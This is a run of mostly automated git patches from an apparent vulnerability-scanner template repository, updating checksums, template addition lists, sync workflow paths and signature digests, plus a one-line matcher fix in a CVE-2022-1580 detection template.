b/http/cves/2022/CVE-2022-1580.yaml index 6fd7cfb485..4dca43836e 100644 --- a/http/cves/2022/CVE-2022-1580.yaml +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -34,7 +34,7 @@ http: - type: word internal: true words: - - 'Site Offline Or Coming Soon Or Maintenance Mode ' #Plugin Check + - 'Site Offline Or Coming Soon Or Maintenance Mode' - method: GET path: @@ -49,4 +49,4 @@ http: condition: or - type: status status: - - 200 \ No newline at end of file + - 200 From 37b8555bcb875e5134555351ac4722a04a62b940 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:40:43 +0000 Subject: [PATCH 1194/1768] Auto Generated New Template Addition List [Thu May 23 05:40:42 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 994432f283..11f2eb1607 100644 --- a/.new-additions +++ b/.new-additions @@ -36,6 +36,7 @@ http/misconfiguration/installer/octoprint-installer.yaml http/misconfiguration/installer/openfire-setup.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/installer/trilium-notes-installer.yaml +http/misconfiguration/installer/wiki-js-installer.yaml http/misconfiguration/installer/xbackbone-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/apache/apache-answer-detect.yaml From 968fa472b71188c8b60c4fee4db3ac95602376cc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:40:49 +0000 Subject: [PATCH 1195/1768] Auto Generated Templates Checksum [Thu May 23 05:40:49 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 38fe9b1856..03792f1d77 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4053,7 +4053,7 @@ http/exposed-panels/metasploit-panel.yaml:35d1b6eb3b01af19738d113656574141b5de32 http/exposed-panels/metasploit-setup-page.yaml:b80a5e11ce34feedcc9992dc5e48f4dbf72f3a3d http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a058 http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b -http/exposed-panels/microfocus-admin-server.yaml:a9b19236d2d61852079741c8757e75f08d10e371 +http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 http/exposed-panels/microfocus-vibe-panel.yaml:d911b51310fcb45341a2a1bba8817ac270ebb08b http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 @@ -5440,7 +5440,7 @@ http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa53 http/misconfiguration/installer/nginx-auto-installer.yaml:ad565c9eee92dff96cc6487522724d96386339d9 http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d727f642283a21d8 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a -http/misconfiguration/installer/octoprint-installer.yaml:d5fdda436ae9b456dca704c3a61af9cf9cd1d64d +http/misconfiguration/installer/octoprint-installer.yaml:71f945261262e651c1349fcf4912d78330ed427e http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 http/misconfiguration/installer/openfire-setup.yaml:a297d11c8460758d07481671287ba0d2e41026d0 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc @@ -5493,9 +5493,10 @@ http/misconfiguration/installer/webasyst-installer.yaml:89e08267f8e97215dcf80f33 http/misconfiguration/installer/webcalendar-install.yaml:030798e0e2618533f5a0f1492cfed7d9558cde7f http/misconfiguration/installer/webtrees-install.yaml:373a89cc6c65f6d44a4b7fd764a7492dff802135 http/misconfiguration/installer/webuzo-installer.yaml:dc4d1a58f425cb8fb42cbc5280cc2ab9cbbb991d +http/misconfiguration/installer/wiki-js-installer.yaml:a54b3842f09194a1413ce2f7ca4130d295309dd9 http/misconfiguration/installer/wowcms-installer.yaml:6df79c7601fd21994a52333494a91a3d653f0573 http/misconfiguration/installer/wp-install.yaml:f09020cd3e1b61762935c650fe0ba42d659657e9 -http/misconfiguration/installer/xbackbone-installer.yaml:30b17b879c64fc395e02e5ba500170c6b381672d +http/misconfiguration/installer/xbackbone-installer.yaml:f5578c7d92a21b929a48e7a9569f6e00db6466b7 http/misconfiguration/installer/yzmcms-installer.yaml:cfd51c27e2bd7ce0dad274cf7d3d8a81519f6d74 http/misconfiguration/installer/zabbix-installer.yaml:c68f624b2a0260aff9280223ed8559ed9438a1b9 http/misconfiguration/installer/zencart-installer.yaml:4b3f6cc0c7a3fdf855d63035860f48020f1c602a @@ -8547,7 +8548,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7ee13e971e67779248aab896dc65a9e8aa6433b2 +templates-checksum.txt:016be23b5b120533f2a850741c18f734f970a9e3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 115697cb25a7f2bee767ba23ab5872cbcbf9ee29 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:41:25 +0000 Subject: [PATCH 1196/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2546fae73c..1a7529e1a2 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -41,6 +41,7 @@ on: - 'http/misconfiguration/installer/openfire-setup.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/installer/trilium-notes-installer.yaml' + - 'http/misconfiguration/installer/wiki-js-installer.yaml' - 'http/misconfiguration/installer/xbackbone-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - 'http/technologies/apache/apache-answer-detect.yaml' From 39aa029ed4099502d717c95cdff8b1bf99da7401 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:42:28 +0000 Subject: [PATCH 1197/1768] Auto Template Signing [Thu May 23 05:42:28 UTC 2024] :robot: --- http/misconfiguration/installer/wiki-js-installer.yaml | 1 + http/technologies/devexpress-detect.yaml | 3 +-- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/installer/wiki-js-installer.yaml b/http/misconfiguration/installer/wiki-js-installer.yaml index 71f619e282..17ee145d7b 100644 --- a/http/misconfiguration/installer/wiki-js-installer.yaml +++ b/http/misconfiguration/installer/wiki-js-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100bbb2395502245442e79f84e2278eea8816e8227be09f9073f749909276f09f9502205ddadd76af727b1dccb27988ad1402b2b0363a727e91739111caaabbcc9f0843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/devexpress-detect.yaml b/http/technologies/devexpress-detect.yaml index 7ad3dcfc73..bb75a25835 100644 --- a/http/technologies/devexpress-detect.yaml +++ b/http/technologies/devexpress-detect.yaml @@ -26,5 +26,4 @@ http: part: body words: - "DXR.axd" - -# digest: 490a0046304402207d0d186d436006888ed2ac008bf749f0e9ceea5ca1a9c1e06785922736698b7e0220627318c732b562d97957499a31a8288e274a59b561aab29325baa0df2917dc39:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e6b541bb707f808e2619e24fee2f542be9a9cbd19eb02851ba751615a5021d88022068d3b18cffac63e834595feb95fef57ed70a2bcd4b9ff6f29df6d6878426b6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 21d8dd6870896b02a910462fc47ce95ade110ebc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:45:08 +0000 Subject: [PATCH 1199/1768] Auto Generated Templates Checksum [Thu May 23 05:45:08 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 03792f1d77..ec787714fd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4055,7 +4055,7 @@ http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 -http/exposed-panels/microfocus-vibe-panel.yaml:d911b51310fcb45341a2a1bba8817ac270ebb08b +http/exposed-panels/microfocus-vibe-panel.yaml:6fdb456f12d78a603126580d7c77987ca475f24c http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml:305a045131b9ca81c700a79e0af7eea801440d69 http/exposed-panels/mikrotik/mikrotik-routeros.yaml:dd9cf9ecc0ab355d2c3cdc748f77443cd796f24d @@ -5493,7 +5493,7 @@ http/misconfiguration/installer/webasyst-installer.yaml:89e08267f8e97215dcf80f33 http/misconfiguration/installer/webcalendar-install.yaml:030798e0e2618533f5a0f1492cfed7d9558cde7f http/misconfiguration/installer/webtrees-install.yaml:373a89cc6c65f6d44a4b7fd764a7492dff802135 http/misconfiguration/installer/webuzo-installer.yaml:dc4d1a58f425cb8fb42cbc5280cc2ab9cbbb991d -http/misconfiguration/installer/wiki-js-installer.yaml:a54b3842f09194a1413ce2f7ca4130d295309dd9 +http/misconfiguration/installer/wiki-js-installer.yaml:21c556bd08a12c651f419ccc23b69d2980c55a1c http/misconfiguration/installer/wowcms-installer.yaml:6df79c7601fd21994a52333494a91a3d653f0573 http/misconfiguration/installer/wp-install.yaml:f09020cd3e1b61762935c650fe0ba42d659657e9 http/misconfiguration/installer/xbackbone-installer.yaml:f5578c7d92a21b929a48e7a9569f6e00db6466b7 @@ -6706,7 +6706,7 @@ http/technologies/dell/dell-idrac7-detect.yaml:60e624f4f081e596c1ae1292ea18f99d7 http/technologies/dell/dell-idrac8-detect.yaml:1dff3a1be021d38ea8846d6151c920edbf995f3e http/technologies/dell/dell-idrac9-detect.yaml:44da5eecdb4a220ccde1aecdd8c801986a988367 http/technologies/detect-sentry.yaml:f4f51185253e23a6e3db1f4bbcb1a37bebf4da1a -http/technologies/devexpress-detect.yaml:62dc0662669d161ebe6dd65e01b544f9a393965a +http/technologies/devexpress-detect.yaml:3bca8b430a118b8374432eb1f048e762b9857f5d http/technologies/directus-detect.yaml:cfea1a80217c3f05df1da02ecd2cf60e988699d5 http/technologies/dreambox-detect.yaml:35362632d9ed50a1e5b4513bfc5a09543c63e431 http/technologies/drupal-detect.yaml:5c269fdf58cf085a8ac062b1f23cd8b3a0ef7f99 @@ -8548,7 +8548,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:016be23b5b120533f2a850741c18f734f970a9e3 +templates-checksum.txt:3093b836c29f2c55f68a85dc6b71f473620aa1ab wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0dd846201cc5bedffe77a401beae2634b59f7d41 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:45:52 +0000 Subject: [PATCH 1200/1768] Auto Generated New Template Addition List [Thu May 23 05:45:52 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 11f2eb1607..eac070ce4a 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/exposed-panels/easyvista-panel.yaml http/exposed-panels/fortinet/f5-next-central-manager.yaml http/exposed-panels/ghost-panel.yaml http/exposed-panels/matomo-panel.yaml +http/exposed-panels/microfocus-lifecycle-panel.yaml http/exposed-panels/n8n-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/oracle-ebusiness-panel.yaml From 944ef8155a9b26026b695a05a875b43c4fd55d74 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:45:56 +0000 Subject: [PATCH 1201/1768] Auto Generated Templates Checksum [Thu May 23 05:45:56 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ec787714fd..33b7438ea5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4055,6 +4055,7 @@ http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 +http/exposed-panels/microfocus-lifecycle-panel.yaml:c4e0d2706ee4069290ed8045bfceff9590c82917 http/exposed-panels/microfocus-vibe-panel.yaml:6fdb456f12d78a603126580d7c77987ca475f24c http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml:305a045131b9ca81c700a79e0af7eea801440d69 @@ -8548,7 +8549,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3093b836c29f2c55f68a85dc6b71f473620aa1ab +templates-checksum.txt:155955176e17b838064b0dd25fb5d1ed2c2ecbc1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 8c7f3e064fc285ce039eed05c049180c3de839ff Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:46:31 +0000 Subject: [PATCH 1202/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 1a7529e1a2..a1efcdf014 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/exposed-panels/fortinet/f5-next-central-manager.yaml' - 'http/exposed-panels/ghost-panel.yaml' - 'http/exposed-panels/matomo-panel.yaml' + - 'http/exposed-panels/microfocus-lifecycle-panel.yaml' - 'http/exposed-panels/n8n-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/oracle-ebusiness-panel.yaml' From 32757e80bcd99de47a053d21648b27c2a7590c59 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:46:50 +0000 Subject: [PATCH 1203/1768] Auto Template Signing [Thu May 23 05:46:50 UTC 2024] :robot: --- http/exposed-panels/microfocus-vibe-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/microfocus-vibe-panel.yaml b/http/exposed-panels/microfocus-vibe-panel.yaml index 712bf493f2..fe281b5dbc 100644 --- a/http/exposed-panels/microfocus-vibe-panel.yaml +++ b/http/exposed-panels/microfocus-vibe-panel.yaml @@ -43,4 +43,5 @@ http: part: body group: 1 regex: - - '(?i)Copyright\s+([0-9-]+)\s+Micro\s+Focus' \ No newline at end of file + - '(?i)Copyright\s+([0-9-]+)\s+Micro\s+Focus' +# digest: 4a0a00473045022100f02b5a7248ba65a3f82f4154f6b10af010264386f1a51a80405e9fc0140dde0502206a992f6203e0788927739e360ce495a8382839cc087edea73c633118e492ba52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a3eb7d491fd5554488cd0066863a95349951efaa Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:46:52 +0000 Subject: [PATCH 1204/1768] Auto Generated New Template Addition List [Thu May 23 05:46:52 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index eac070ce4a..1a869da1e6 100644 --- a/.new-additions +++ b/.new-additions @@ -45,6 +45,7 @@ http/technologies/boa-web-server.yaml http/technologies/craftercms-detect.yaml http/technologies/imgproxy-detect.yaml http/technologies/meilisearch-detect.yaml +http/technologies/microfocus-iprint-detect.yaml http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml http/technologies/uni-gui-framework.yaml From 42205cd5c25b7b10f3c7340e91a63641c9a57799 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:46:58 +0000 Subject: [PATCH 1205/1768] Auto Generated Templates Checksum [Thu May 23 05:46:58 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 33b7438ea5..3f5e36933f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6831,6 +6831,7 @@ http/technologies/matrix-detect.yaml:33b6e2aef92cf34e8fdfa015ed1d7c4cbb0c9ca7 http/technologies/matrix-homeserver-detect.yaml:03f44055b1385667e1d860c9160c9b0a3b5b24b0 http/technologies/meilisearch-detect.yaml:a6496077c0c1e7d4dea5346d51d2f0863e8c0fa7 http/technologies/metatag-cms.yaml:dddeec9fe5817ce89ce12c7fb09e5702c6cf5ea7 +http/technologies/microfocus-iprint-detect.yaml:f4da103b97937df82192da15635df1182c970505 http/technologies/microsoft/aspnet-version-detect.yaml:e37201ff3f26965873974a21c6bd351a7cbe851c http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:8f445b5529fb0bb219994e249b2cc3aa4e868f97 http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d @@ -8549,7 +8550,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:155955176e17b838064b0dd25fb5d1ed2c2ecbc1 +templates-checksum.txt:53bdb963d778b9373498578ab71409606d1a4555 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f3340c22f90afe7ebbb81606f84bc4546acf0b3c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:47:33 +0000 Subject: [PATCH 1207/1768] Auto Generated Templates Checksum [Thu May 23 05:47:33 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3f5e36933f..538c94a7e6 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4056,7 +4056,7 @@ http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd5 http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 http/exposed-panels/microfocus-lifecycle-panel.yaml:c4e0d2706ee4069290ed8045bfceff9590c82917 -http/exposed-panels/microfocus-vibe-panel.yaml:6fdb456f12d78a603126580d7c77987ca475f24c +http/exposed-panels/microfocus-vibe-panel.yaml:5405bdcbb28cf44943d03d51c8ce86ec8ba52055 http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 http/exposed-panels/mikrotik/mikrotik-routeros-old.yaml:305a045131b9ca81c700a79e0af7eea801440d69 http/exposed-panels/mikrotik/mikrotik-routeros.yaml:dd9cf9ecc0ab355d2c3cdc748f77443cd796f24d @@ -4878,7 +4878,7 @@ http/exposures/logs/darkstat-detect.yaml:27249feadc758fe3a1febc93221581a4cd949f3 http/exposures/logs/development-logs.yaml:7ac242fe7f0381b896abdb10d387c98e93b3dc97 http/exposures/logs/django-debug-exposure.yaml:abd2a8bf74edb70e893b6cc3ad872f30072a32b5 http/exposures/logs/dozzle-container-logs.yaml:06ff374b87484f1f2020b179c702d0699b18a420 -http/exposures/logs/elmah-log-file.yaml:f36a5a5a0362cb042477717ced54a714cdf51ba6 +http/exposures/logs/elmah-log-file.yaml:031fff182953ca9b4f82344c7d2d1b563695ccf6 http/exposures/logs/error-logs.yaml:cef1a514b4c2862367f9f7512120ca223ad31d51 http/exposures/logs/event-debug-server-status.yaml:87345798d5bc327bbef0b0dbc13d5aff09eb65e2 http/exposures/logs/exposed-glances-api.yaml:687cfc585e23fb4f129877f77d06f7b92fadec63 @@ -8550,7 +8550,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:53bdb963d778b9373498578ab71409606d1a4555 +templates-checksum.txt:ce16b42e7284a90fdf52d4386a023b68ca8133b2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e668a7240f000b74d4276b1ff13df3959e29c1cf Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:47:39 +0000 Subject: [PATCH 1208/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a1efcdf014..6f90b67d54 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -50,6 +50,7 @@ on: - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/imgproxy-detect.yaml' - 'http/technologies/meilisearch-detect.yaml' + - 'http/technologies/microfocus-iprint-detect.yaml' - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' - 'http/technologies/uni-gui-framework.yaml' From 55726e83c581645c4794b2b542158d499e1d730a Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:48:02 +0000 Subject: [PATCH 1209/1768] Auto Generated New Template Addition List [Thu May 23 05:48:02 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1a869da1e6..231cf768e5 100644 --- a/.new-additions +++ b/.new-additions @@ -30,6 +30,7 @@ http/honeypot/tpot-honeypot-detect.yaml http/misconfiguration/imgproxy-unauth.yaml http/misconfiguration/installer/custom-xoops-installer.yaml http/misconfiguration/installer/easy-viserlabs-installer.yaml +http/misconfiguration/installer/forgejo-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml http/misconfiguration/installer/ids-skills-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml From b2fe9c76e3b2ce19e736f9b8757df5056f4b4911 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:48:06 +0000 Subject: [PATCH 1210/1768] Auto Generated Templates Checksum [Thu May 23 05:48:06 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 538c94a7e6..2f20e5ac34 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5408,6 +5408,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea +http/misconfiguration/installer/forgejo-installer.yaml:7bb822ad620aba636554fd7151554a76b8bfa48a http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e @@ -8550,7 +8551,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ce16b42e7284a90fdf52d4386a023b68ca8133b2 +templates-checksum.txt:83af1dc90702df15b465bfb26d269eb6821879d1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0426114891c6fe4fa866ebd6cb5863829abaeee3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 05:48:51 +0000 Subject: [PATCH 1211/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6f90b67d54..542807e327 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -35,6 +35,7 @@ on: - 'http/misconfiguration/imgproxy-unauth.yaml' - 'http/misconfiguration/installer/custom-xoops-installer.yaml' - 'http/misconfiguration/installer/easy-viserlabs-installer.yaml' + - 'http/misconfiguration/installer/forgejo-installer.yaml' - 'http/misconfiguration/installer/froxlor-installer.yaml' - 'http/misconfiguration/installer/ids-skills-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' From fec8faad67776816e3176eec6f6a023da3f516ab Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 05:49:01 +0000 Subject: [PATCH 1213/1768] Auto Generated Templates Checksum [Thu May 23 05:49:01 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2f20e5ac34..0bdc50aa97 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6529,7 +6529,7 @@ http/takeovers/canny-takeover.yaml:cc5a760aa65559322a94344f7add91e523a63db1 http/takeovers/cargo-takeover.yaml:42db7ee4771a5cbddc6e2b8072070c583d6fd452 http/takeovers/cargocollective-takeover.yaml:dde78512f960c62936577c19801b1446ec65d5d3 http/takeovers/clever-takeover.yaml:f4d45f5b42f376d3258d2b4140a9dad14e25cd87 -http/takeovers/flexbe-takeover.yaml:beb769a298f11ffc28a49fbdc3f9e15c4d22a181 +http/takeovers/flexbe-takeover.yaml:bd450946fb6237dbf99f21409082be3ebb6d295b http/takeovers/frontify-takeover.yaml:e7700c7ad9bb5a761d8bd1395c6a5360c91b3dcb http/takeovers/gemfury-takeover.yaml:69d22f9c935be01d0ebad5946a9766eafe12fc68 http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9bd @@ -8551,7 +8551,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a 